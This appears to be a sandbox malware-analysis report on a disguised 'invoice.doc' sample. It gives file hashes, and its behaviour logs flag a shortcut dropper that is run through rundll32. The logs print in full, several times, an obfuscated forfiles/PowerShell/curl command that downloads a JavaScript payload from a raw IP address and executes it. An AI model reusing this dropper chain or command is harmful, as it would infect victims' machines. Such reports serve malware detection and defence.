Malicious
DOC/DropFileExec.FW.1010
profrog
1.5.0.305
10
invoice.doc
DOC
2.817780
false
false
invoice.doc_16880
d:\Sample\sample_for_QuadMiners\invoice.doc
invoice.doc
16880
DOC
36B85687634E5B6E4E22CA582D0CC99D
1B51B1206F2C4B1030A7FCA525454FB4D5BC803E
invoice
D80336481A8DD017C0B966BC18E74609243A2F05
504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000
skeml.lnk_258
invoice.doc_16880
D:/GIT/tripitaka/Build/x64Debug/tripitaka.exe.sandbox/C/Users/Public/skeml.lnk
skeml.lnk
258
LNK
1205E837D76605911605E2FB589CD98D
FF41313E2F2A860B0573F5EFA77B9962A88B3D82
A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D
086F7D4F4022A035D30A5DAFB1422C0C178C76BE
EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A
profrog
1.5.0.305
invoice.doc_16880
FakeEXT-DOCX
3
A DOCX file is disguised as `DOC` format.
A file in DOCX format disguised itself as being in `DOC` format.
profrog
1.5.0.305
invoice.doc_16880
GetObject
BC
1
GetObject("NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8"), RET: WSCRIPT.SHELL
profrog
1.5.0.305
invoice.doc_16880
CreateShortCut
BC
2
ARF5XJ(WSCRIPT.SHELL).CreateShortCut("C:\Users\Public\skeml.lnk"), RET: SHORTCUT
profrog
1.5.0.305
invoice.doc_16880
Save
BC
1
RECO(SHORTCUT).Save()
profrog
1.5.0.305
invoice.doc_16880
FileCreated
FW
3
New file (C:\Users\Public\skeml.lnk) has been created.
[DEFAULT]
WindowStyle=7
IconLocation=
TargetPath=fOrfiLeS
Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js"
WorkingDirectory=
A new file (C:\Users\Public\skeml.lnk) has been created.
[DEFAULT]
WindowStyle=7
IconLocation=
TargetPath=fOrfiLeS
Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js"
WorkingDirectory=
profrog
1.5.0.305
invoice.doc_16880
FileExtracted
FW
3
C:\Users\Public\skeml.lnk
profrog
1.5.0.305
invoice.doc_16880
Exec
BC
3
ARF5XJ(WSCRIPT.SHELL).Exec("rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk")
profrog
1.5.0.305
invoice.doc_16880
DropFileExec
FW
10
This is an attack that drops a hidden file and executes it.
This is an attack that creates a hidden file and executes it.
profrog
1.5.0.305
invoice.doc_16880
RunDll32
FW
3
Attempts to execute OpenURL() of url.dll. It is used to perform malicious actions with a DLL received from an external source.
Attempts to execute OpenURL() of url.dll. It is used to perform malicious actions with a DLL received from an external source.
profrog
1.5.0.305
skeml.lnk_258
ForFiles
FW
3
Attempts to run a command with forfiles.
/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js"
Attempts to execute a specific command with forfiles.
/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js"
profrog
1.5.0.305
skeml.lnk_258
PowerShell
FW
8
Attempts to perform malicious commands with PowerShell.
command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js
Attempts to perform malicious commands with PowerShell.
command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js